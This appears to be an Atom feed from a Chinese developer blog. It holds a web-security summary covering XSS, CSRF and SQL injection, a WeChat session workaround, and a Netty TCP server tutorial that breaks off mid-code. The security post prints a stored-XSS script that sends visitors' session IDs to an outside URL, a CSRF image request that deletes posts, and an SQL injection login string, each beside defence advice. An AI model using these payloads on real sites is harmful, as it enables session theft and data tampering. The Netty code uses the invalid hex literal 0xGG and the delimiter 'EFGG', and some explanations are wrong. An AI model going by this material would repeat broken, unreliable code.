<p>最后由网卡将数字信息转换为光信号经网线发送出去,将服务器通过交换机和路由器接收到请求包后像剥洋葱一样一层一层解析包中内容。</p>
<p>小结,一个HTTP请求总共要经历如下几层协议:</p>
<ul>
<li><p>应用层:定义数据格式,并按照对应的格式解读数据。 –HTTP</p>
</li>
<li><p>传输层:定义端口,确认主机上应用程序的身份,并将数据包交给对应的应用程序。 –TCP</p>
</li>
<li><p>网络层:定义IP地址,确认主机所在的网络位置,并通过IP进行MAC寻址,对外网数据包进行路由转发。 –IP</p>
</li>
<li><p>链路层:对0和1进行分组,定义数据帧,确认主机的物理地址,传输数据。 –物理传输</p>
</li>
</ul></summary>
<category term="JAVA" scheme="https://reiner.host/categories/JAVA/"/>
<category term="TCP" scheme="https://reiner.host/tags/TCP/"/>
<category term="HTTP协议" scheme="https://reiner.host/tags/HTTP%E5%8D%8F%E8%AE%AE/"/>
</entry>
<entry>
<title>WEB安全总结</title>
<link href="https://reiner.host/posts/d581b2e3.html"/>
<id>https://reiner.host/posts/d581b2e3.html</id>
<published>2021-05-13T02:41:00.000Z</published>
<updated>2021-12-24T12:18:32.977Z</updated>
<content type="html"><![CDATA[<h1><span id="前言">前言</span></h1><p> 最近看了《白帽子讲WEB安全》,书的内容可能已经过时了,但是用来提高安全意识还是不错的,现在将它记下来做个总结。</p><p>WEB安全整体给我的感觉是虽然重要,但攻击手段有限,安全的大头还是在服务器安全这块。</p><h1><span id="xss攻击">XSS攻击</span></h1><p>先来第一个,XSS攻击,XSS攻击主要分为两类: 1、存储型XSS 2、反射型XSS ,先来看反射型XSS攻击。</p><h4><span id="反射型xss攻击">反射型XSS攻击</span></h4><p>所谓反射型XSS攻击其实就是利用JAVASCRIPT解析漏洞,将原本该解析成HTML的内容解析成了JS代码,那么如何实现攻击的呢? 假设某个20年前原始的网站有如下代码:</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">请输入搜索关键字:<span class="tag"><<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">name</span>=<span class="string">"search"</span> ></span></span><br><span class="line"></span><br><span class="line">您的搜索关键字是:${keyword}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>此时我们输入:<code><script>alert('xss')</script></code> ,点击搜索后,发现页面上打印alert(xss)了,但是这样只是控制了自己的浏览器JS,没有意义(用浏览器控制台一样可以做到),因此要将此漏洞散布出去。</p><p>假设它的搜索请求url是:<a href="http://reiner.host/search?keyword=WEB%E5%AE%89%E5%85%A8%E6%80%BB%E7%BB%93">http://reiner.host/search?keyword=WEB安全总结</a> ,将其改为 <a href="http://reiner.host/search?keyword=">http://reiner.host/search?keyword=</a><script>alert(cookie.sid)</script> ,并将链接分享出去,诱导别人去点击。</p><p>此时这个倒霉鬼如果刚好登陆了该网站,那么你就可以通过JS拿到他的sessionId,然后弄个不可见的iframe将sessionId传到自己的服务器,从而为所欲为了。</p><p>PS:担心加上JS代码后链接过长可以弄个短链接。</p><p><strong>所以防止反射型XSS的关键点在于不能直接将用户输入的内容展现出来</strong>,绝大部分前端框架一般是解决了此问题的,即用户输入内容不会被浏览器解析为JS代码,但不排除一定就没有XSS漏洞了。</p><p><strong>防反射型XSS攻击总结</strong></p><p>1、对于用户输入的内容不要直接展示</p><p>2、使用稳定的开源框架,一般有自动处理</p><p><em>这就是为什么要注意不要乱点链接</em></p><span id="more"></span><h4><span id="储存型xss攻击">储存型XSS攻击</span></h4><p>此类漏洞危害性最大,是反射型XSS攻击的加强版,原理依旧是将用户输入内容解析为JS代码。</p><p>假设某论坛没有对用户输入内容做处理直接展示,此时我新建一个帖子,内容如下:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><script></span><br><span class="line"><span class="built_in">window</span>.open(<span class="string">'http://reiner.host/xss?cookieId='</span>+cookie.sessionId);</span><br><span class="line"></script></span><br></pre></td></tr></table></figure><p>标题为:震惊!一对男女大白天在办公室竟干出这种事!(附图片) ,我相信会有很多人点进来,然后他们就会自动打开新窗口,他们的session id我全知道了。</p><p>如果想做得绝一点,甚至可以做个隐藏表单提交,表单请求一些删除操作的接口。。。</p><p><strong>防存储型XSS攻击总结</strong></p><p>1、在做好反射型XSS攻击的基础上增加XSS过滤器,github上应该有很多现成的xss过滤器可以用,将js代码转义再存储</p><p>2、设置http header里的http only 为true,这样浏览器会禁止js代码读取cookie</p><h1><span id="csrf跨域脚本攻击">CSRF跨域脚本攻击</span></h1><p>CSRF其基本原理是伪造请求,即对于服务器来说,请求是合法的,但是这可能并不是用户主动发起的,假设某论坛网站的删除接口URL是 <a href="https://reiner.host/delete?id=%7Bid%7D">https://reiner.host/delete?id={id}</a> </p><p>通过查看帖子我知道了某用户的一个帖子ID是1,此时我给该用户发私信了,内容是: <code><img src="https://reiner.host/delete?id=1"/></code> 。</p><p>该用户打开私信时看到的只是一张加载失败的图片,但是实际上浏览器已经请求了delete接口,他的ID为1的帖子已经被删除了。</p><p><strong>防CSRF跨域脚本攻击总结</strong></p><p>1、 Referer check来源检查,请求不能是通过其它域名请求过来的。</p><p>2、使用TOKEN验证用户身份,这样伪造请求的接口地址中没有TOKEN就无法请求成功</p><p>以上均为示例,实际攻击手段各种各样。</p><h1><span id="flash漏洞">FLASH漏洞</span></h1><p>这个玩意漏洞一堆,所以可以看到chrome为了安全已经把它禁用了,而且这个年代已经没有人使用FLASH了,因此FLASH直接PASS 。</p><h1><span id="sql注入">SQL注入</span></h1><p>这个年代SQL注入基本上已经凉了,除非某些新手同志写代码不好好用占位符,假设漏洞代码如下 :</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">@Autowired</span></span><br><span class="line">JdbcTemplate jdbcTemplate;</span><br><span class="line"></span><br><span class="line"><span class="meta">@RequestMapping("login")</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> String <span class="title">login</span><span class="params">(String userName,String password)</span></span>{</span><br><span class="line"> jdbcTemplate.query(<span class="string">"SELECT * FROM USER WHERE USER_NAME = "</span>+userName + <span class="string">" AND PASSWORD = "</span>+password);</span><br><span class="line"> ...以下省略</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>在登陆框里输入用户名为:<code>admin --</code> 密码: 随便填 ,拼出来的SQL就变成了:<code>SELECT * FROM USER WHERE USER_NAME = admin --AND PASSWORD=123</code> ,后面的条件都注释掉了。</p><p><strong>应对方法</strong></p><p>1、使用参数占位符,举例:<code>jdbcTemplate.query("SELECT * FROM USER WHERE USER_NAME = ? AND PASSWORD = ?",userName,password);</code>,使用mybatis的${}要注意,此符号是拼接SQL。</p><p>2、参数过滤,每个添加、修改请求过滤参数里可能存在的敏感字符,如UPDATE DELETE 等,网上已经有大量的开源工具可以帮我们过滤。</p><h1><span id="会话劫持">会话劫持</span></h1><p>浏览器和服务器之间的通信内容被人抓包到了,劫持人获得了你的TOKEN以及所有请求内容</p><p>解决:<br>1、上HTTPS</p><p>2、每次请求返回带上下一次请求的随机数,后端验证该随机数是否正确</p><h1><span id="其它安全">其它安全</span></h1><p>不在WEB安全范围内,有如下几点:</p><ul><li>TCP连接攻击</li><li>DDOS攻击</li><li>服务器安全配置</li><li>系统漏洞扫描</li><li></li></ul><p><strong>其它WEB安全:</strong></p><ul><li>代码扫描</li><li>XSS漏洞扫描</li></ul><p><strong>渗透测试工具</strong></p><ul><li>SQLmap - 可自动检测和利用SQL注入漏洞</li><li>John the Ripper - 一款免费的密码破解软件工具</li><li>Netsparker Security Scanner - 用于渗透测试的Web应用工具</li><li>W3af - 分析和利用基于Web的应用中可能存在的任何安全漏洞</li></ul><p>以上工具可以帮助我们发现WEB应用中可能存在的漏洞。</p>]]></content>
<summary type="html"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p> 最近看了《白帽子讲WEB安全》,书的内容可能已经过时了,但是用来提高安全意识还是不错的,现在将它记下来做个总结。</p>
<p>WEB安全整体给我的感觉是虽然重要,但攻击手段有限,安全的大头还是在服务器安全这块。</p>
<h1 id="XSS攻击"><a href="#XSS攻击" class="headerlink" title="XSS攻击"></a>XSS攻击</h1><p>先来第一个,XSS攻击,XSS攻击主要分为两类: 1、存储型XSS 2、反射型XSS ,先来看反射型XSS攻击。</p>
<h4 id="反射型XSS攻击"><a href="#反射型XSS攻击" class="headerlink" title="反射型XSS攻击"></a>反射型XSS攻击</h4><p>所谓反射型XSS攻击其实就是利用JAVASCRIPT解析漏洞,将原本该解析成HTML的内容解析成了JS代码,那么如何实现攻击的呢? 假设某个20年前原始的网站有如下代码:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">请输入搜索关键字:<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;text&quot;</span> <span class="attr">name</span>=<span class="string">&quot;search&quot;</span> &gt;</span></span><br><span class="line"></span><br><span class="line">您的搜索关键字是:$&#123;keyword&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>此时我们输入:<code>&lt;script&gt;alert(&#39;xss&#39;)&lt;/script&gt;</code> ,点击搜索后,发现页面上打印alert(xss)了,但是这样只是控制了自己的浏览器JS,没有意义(用浏览器控制台一样可以做到),因此要将此漏洞散布出去。</p>
<p>假设它的搜索请求url是:<a href="http://reiner.host/search?keyword=WEB%E5%AE%89%E5%85%A8%E6%80%BB%E7%BB%93">http://reiner.host/search?keyword=WEB安全总结</a> ,将其改为 <a href="http://reiner.host/search?keyword=">http://reiner.host/search?keyword=</a><script>alert(cookie.sid)</script> ,并将链接分享出去,诱导别人去点击。</p>
<p>此时这个倒霉鬼如果刚好登陆了该网站,那么你就可以通过JS拿到他的sessionId,然后弄个不可见的iframe将sessionId传到自己的服务器,从而为所欲为了。</p>
<p>PS:担心加上JS代码后链接过长可以弄个短链接。</p>
<p><strong>所以防止反射型XSS的关键点在于不能直接将用户输入的内容展现出来</strong>,绝大部分前端框架一般是解决了此问题的,即用户输入内容不会被浏览器解析为JS代码,但不排除一定就没有XSS漏洞了。</p>
<p><strong>防反射型XSS攻击总结</strong></p>
<p>1、对于用户输入的内容不要直接展示</p>
<p>2、使用稳定的开源框架,一般有自动处理</p>
<p><em>这就是为什么要注意不要乱点链接</em></p></summary>
<category term="JAVA" scheme="https://reiner.host/categories/JAVA/"/>
<category term="WEB安全" scheme="https://reiner.host/tags/WEB%E5%AE%89%E5%85%A8/"/>
<category term="xss攻击" scheme="https://reiner.host/tags/xss%E6%94%BB%E5%87%BB/"/>
<category term="csrf攻击" scheme="https://reiner.host/tags/csrf%E6%94%BB%E5%87%BB/"/>
<category term="SQL注入" scheme="https://reiner.host/tags/SQL%E6%B3%A8%E5%85%A5/"/>
</entry>
<entry>
<title>微信小程序用户请求同一个接口session会话会阻塞</title>
<link href="https://reiner.host/posts/d84fac55.html"/>
<id>https://reiner.host/posts/d84fac55.html</id>
<published>2021-04-02T03:06:18.000Z</published>
<updated>2021-12-24T12:18:33.140Z</updated>
<content type="html"><![CDATA[<h1><span id="说明">说明</span></h1><p> 微信开发真乃坑中之坑,会话阻塞场景如下: </p><p>小程序,有两个用户同时访问同一个接口会阻塞,第二个请求的人必须请等一个请求的人处理完毕才会响应第二个请求。</p><p>但如果我在 PC 上用两个不同的浏览器同时请求这个接口,是并行的,从结果上来看可能是 session 阻塞,即同一个会话同时只能处理一个请求。</p><p>我的测试代码如下:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">@RestController()</span></span><br><span class="line"><span class="meta">@RequestMapping("test")</span></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">TestController</span> </span>{</span><br><span class="line"></span><br><span class="line"><span class="meta">@GetMapping("block")</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> String <span class="title">test2</span><span class="params">()</span> </span>{</span><br><span class="line"><span class="keyword">try</span> {</span><br><span class="line">System.out.println(<span class="string">"blocking... "</span>+Thread.currentThread().getName());</span><br><span class="line">Thread.sleep(<span class="number">8000l</span>);</span><br><span class="line">} <span class="keyword">catch</span> (InterruptedException e) {</span><br><span class="line">e.printStackTrace();</span><br><span class="line">}</span><br><span class="line"><span class="keyword">return</span> <span class="string">"OK"</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>两个不同的小程序用户同时请求,第二个请求的人必须请等一个请求的人返回OK才会打印第二个请求的日志,理论上来说,不同用户的请求应当是并行的,但服务器似乎将它们视为同一个会话(session)了。</p><p>一开始想到了异步处理,即controller返回callable让处理不占用会话,但是发现这样做事务没法控制!</p><h1><span id="解决办法">解决办法</span></h1><p>最终使用了比较粗暴的解决办法,即不使用微信浏览器生成的session id,而是每次请求都由前端生成一个随机数作为session id,这样用户的请求就不会被视为同一个会话了</p>]]></content>
<summary type="html"><h1><span id="说明">说明</span></h1><p> 微信开发真乃坑中之坑,会话阻塞场景如下: </p>
<p>小程序,有两个用户同时访问同一个接口会阻塞,第二个请求的人必须请等一个请求的人处理完毕才会响应第二个请求。</p>
<p>但如果我在 PC 上用两个不</summary>
<category term="JAVA" scheme="https://reiner.host/categories/JAVA/"/>
<category term="微信小程序" scheme="https://reiner.host/tags/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/"/>
<category term="WEB开发" scheme="https://reiner.host/tags/WEB%E5%BC%80%E5%8F%91/"/>
<category term="session" scheme="https://reiner.host/tags/session/"/>
<category term="BUG" scheme="https://reiner.host/tags/BUG/"/>
</entry>
<entry>
<title>使用netty作为TCP服务端并使用16进制与硬件进行通信</title>
<link href="https://reiner.host/posts/94ca3821.html"/>
<id>https://reiner.host/posts/94ca3821.html</id>
<published>2021-03-22T02:55:33.000Z</published>
<updated>2021-12-24T12:18:33.129Z</updated>
<content type="html"><![CDATA[<h1><span id="说明">说明</span></h1><p>本文记录了在使用netty作为TCP服务端的情况下,如何解决TCP粘包、半包问题,以及如何使用16进制与客户端进行通信。</p><h1><span id="依赖">依赖</span></h1><p>首先添加maven依赖:</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">dependency</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">groupId</span>></span>io.netty<span class="tag"></<span class="name">groupId</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">artifactId</span>></span>netty-all<span class="tag"></<span class="name">artifactId</span>></span></span><br><span class="line"><span class="tag"></<span class="name">dependency</span>></span></span><br></pre></td></tr></table></figure><h1><span id="代码">代码</span></h1><h3><span id="创建字节转换类">创建字节转换类</span></h3><p>首先创建一个将字节转换为16进制的处理类,并判断包头包尾是否正确。</p><span id="more"></span><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">CustomDecode</span> <span class="keyword">extends</span> <span class="title">ByteToMessageDecoder</span> </span>{</span><br><span class="line"></span><br><span class="line">Logger logger = LoggerFactory.getLogger(getClass());</span><br><span class="line"></span><br><span class="line"> <span class="meta">@Override</span></span><br><span class="line"> <span class="function"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title">decode</span><span class="params">(ChannelHandlerContext channelHandlerContext, ByteBuf in, List<Object> out)</span> <span class="keyword">throws</span> Exception </span>{</span><br><span class="line"> <span class="keyword">int</span> len = in.readableBytes(); <span class="comment">//这里得到可读取的字节长度</span></span><br><span class="line"> in.markReaderIndex(); <span class="comment">//包头做标记位,后面可以重新回到数据包头开始读数据</span></span><br><span class="line"> <span class="comment">//有数据时开始读数据包</span></span><br><span class="line"> <span class="keyword">if</span> (len > <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">byte</span>[] src = <span class="keyword">new</span> <span class="keyword">byte</span>[len];</span><br><span class="line"> in.readBytes(src); <span class="comment">//把数据读到字节数组中(读取完之后指针会到最后一个数据)</span></span><br><span class="line"> in.resetReaderIndex(); <span class="comment">//重置当前指针到标记位(包头),用于重新读取接收的数据,直至接收完完整数据包</span></span><br><span class="line"> <span class="keyword">if</span>(len><span class="number">1</span>) {</span><br><span class="line"> <span class="comment">//判断包头是否为约定的字节</span></span><br><span class="line"> <span class="keyword">if</span>((src[<span class="number">0</span>] & <span class="number">0x000000ff</span>) != <span class="number">0xAB</span> || (src[<span class="number">1</span>] & <span class="number">0x000000ff</span>) != <span class="number">0xCD</span>) {</span><br><span class="line"> logger.warn(<span class="string">"无法识别的包头,转换为16进制的包头为:{}"</span>,StringUtil.byteToHexString(src));</span><br><span class="line"> <span class="comment">// 包头不对,直接断开连接</span></span><br><span class="line"> channelHandlerContext.close();</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">//字节转换为16进制,判断最后两个字节是否为结尾字节,0x000000ff等于十进制的255</span></span><br><span class="line"> <span class="keyword">if</span>((src[len-<span class="number">2</span>] & <span class="number">0x000000ff</span>) == <span class="number">0xEF</span> && (src[len-<span class="number">1</span>] & <span class="number">0x000000ff</span>) == <span class="number">0</span>xGG) {</span><br><span class="line"> in.skipBytes(in.readableBytes());<span class="comment">//标记已读取完毕</span></span><br><span class="line"> <span class="comment">//收到了尾部字节,完成接收</span></span><br><span class="line"> out.add(src);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="comment">//非结尾字节,继续接收,当数据包的长度不够时直接return,netty在缓冲区有数据时会一直调用decode方法,所以我们只需要等待下一个数据包传输过来一起解析(解决半包问题)</span></span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line"> }<span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// 发空数据包过来的家伙直接断开连接</span></span><br><span class="line"> channelHandlerContext.close();</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="meta">@Override</span></span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">exceptionCaught</span><span class="params">(ChannelHandlerContext ctx, Throwable cause)</span> <span class="keyword">throws</span> Exception </span>{</span><br><span class="line"> logger.error(<span class="string">"TCP连接异常!,信息:{}"</span>,cause.getMessage(),cause);</span><br><span class="line"><span class="comment">// ctx.close();</span></span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>以上为数据处理类,首先判断包头是否为约定的16进制数据,其次判断包尾是否为约定的字节,如不是则return继续接收数据直到接收到了包尾。</p><p>工具类 <code>StringUtil.byteToHexString</code>的作用是将字节转换为16进制字符串,此工具类为netty自带,**<code>(src[0] & 0x000000ff)</code> 表示将下标为0的字节转换为16进制**</p><h3><span id="创建字节处理初始化类">创建字节处理初始化类</span></h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">ServerInitializer</span> <span class="keyword">extends</span> <span class="title">ChannelInitializer</span><<span class="title">SocketChannel</span>> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="meta">@Override</span></span><br><span class="line"> <span class="function"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title">initChannel</span><span class="params">(SocketChannel channel)</span> <span class="keyword">throws</span> Exception </span>{</span><br><span class="line"> channel.pipeline(). </span><br><span class="line"> <span class="comment">//包尾以EFGG结束,使用netty自带的粘包处理器,false参数表示不去掉包尾字符</span></span><br><span class="line"> addLast(<span class="keyword">new</span> DelimiterBasedFrameDecoder(<span class="number">1024</span>,<span class="keyword">false</span>,Unpooled.copiedBuffer(TCPServerUtils.hexStr2bytes(<span class="string">"EFGG"</span>)))).</span><br><span class="line"> addLast(<span class="keyword">new</span> CustomDecode()). <span class="comment">//自定义解码器</span></span><br><span class="line"> addLast(<span class="keyword">new</span> TCPServerHandler()) <span class="comment">//自定义处理器</span></span><br><span class="line"> ;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line">} </span><br></pre></td></tr></table></figure><p>初始化字节处理类,并使用netty自带的粘包处理器解决粘包问题,<code>addLast(new DelimiterBasedFrameDecoder(1024,false,Unpooled.copiedBuffer(TCPServerUtils.hexStr2bytes("EFGG"))))</code> 表示以EFGG结尾的数据分割包</p><p>简单的说明一下半包和粘包,<strong>半包:</strong> 假设数据包以16进制 AABB开头,以EFGG结尾,中间放具体数据,但是TCP传输可能只传了AABB,EFGG可能是在第二次传输过来,因此要等一个完整的数据包传输过来后再做处理。</p><p><strong>粘包:</strong> 假设数据包内容为”AABBHHEFGG“是一个完整的包,但是TCP在传输过程中可能是这样传的:<code>AABBHHEFGGAABBH</code> ,本来应该是两个包的内容给放在了一起,而且还不完整,这就是粘包。</p><h3><span id="创建业务处理类">创建业务处理类</span></h3><p>有了上面的字节处理类,在这一层拿到的就是分割好的完整数据包了,此时可以对字节做截取,去掉包头包尾读取中间内容,代码如下:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">TCPServerHandler</span> <span class="keyword">extends</span> <span class="title">ChannelInboundHandlerAdapter</span></span>{</span><br><span class="line">Logger logger = LoggerFactory.getLogger(getClass());</span><br><span class="line"></span><br><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">channelRead</span><span class="params">(ChannelHandlerContext ctx, Object msg)</span> </span>{</span><br><span class="line"><span class="comment">// 这里msg就是从解码器中传来的数据,解码器传输过来是什么格式,这里直接转成对应的格式就可以</span></span><br><span class="line"><span class="keyword">byte</span>[] src = (<span class="keyword">byte</span>[]) msg;</span><br><span class="line"></span><br><span class="line">String hexString = StringUtil.toHexString(src);</span><br><span class="line"><span class="comment">//logger.info("接收到完整16进制数据:{}", hexString);</span></span><br><span class="line"><span class="keyword">try</span> {</span><br><span class="line">Channel channel = ctx.channel();</span><br><span class="line"></span><br><span class="line"><span class="comment">// TODO 此处一般先要拿到数据包做一次checksum,即判断一下包数据是否正确</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">// 要返回的字节</span></span><br><span class="line"><span class="keyword">byte</span>[] resp = <span class="keyword">null</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">// 假设功能码字节在第8位</span></span><br><span class="line"><span class="keyword">byte</span> action = src[<span class="number">8</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">switch</span> ((action & <span class="number">0x000000ff</span>)) {</span><br><span class="line"><span class="keyword">case</span> <span class="number">0x08</span>:</span><br><span class="line"><span class="comment">// 假设0x08表示请求认证</span></span><br><span class="line">resp = ServerUtils.makeResponse(<span class="string">"0200"</span>,<span class="string">"01"</span>);<span class="comment">// 返回成功</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//TODO 此处绑定channel与识别码</span></span><br><span class="line">map.put(deviceId,channel);<span class="comment">//deviceId 从数据包中截取</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//上报在线状态</span></span><br><span class="line">...</span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">default</span>:</span><br><span class="line">logger.error(<span class="string">"未知的上传包信息!"</span>);</span><br><span class="line"><span class="keyword">break</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (resp != <span class="keyword">null</span>) {</span><br><span class="line">ByteBuf buf = Unpooled.copiedBuffer(resp);</span><br><span class="line">channel.writeAndFlush(buf);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">} <span class="keyword">catch</span> (Exception e) {</span><br><span class="line">logger.info(<span class="string">"服务器处理出错!出错信息:{}"</span>,e.getMessage(),e);</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 设备离线事件</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">handlerRemoved</span><span class="params">(ChannelHandlerContext ctx)</span> <span class="keyword">throws</span> Exception </span>{</span><br><span class="line"><span class="comment">//TODO 上报离线状态</span></span><br><span class="line"><span class="keyword">super</span>.handlerRemoved(ctx);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">exceptionCaught</span><span class="params">(ChannelHandlerContext ctx, Throwable cause)</span> </span>{</span><br><span class="line">cause.printStackTrace();</span><br><span class="line">logger.error(<span class="string">"发生异常:"</span> + cause.getMessage());</span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p><strong>注意点:一定要新建一个Map保存认证设备的唯一识别码,netty中的channel即表示一个会话,因此在请求认证时就要将识别码与channel进行绑定,这样才可以随时向客户端发送消息。</strong></p><p>checksum工具类代码如下:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> String <span class="title">makeChecksum</span><span class="params">(String data)</span> </span>{</span><br><span class="line"><span class="keyword">if</span> (data == <span class="keyword">null</span> || data.equals(<span class="string">""</span>)) {</span><br><span class="line"><span class="keyword">return</span> <span class="string">""</span>;</span><br><span class="line">}</span><br><span 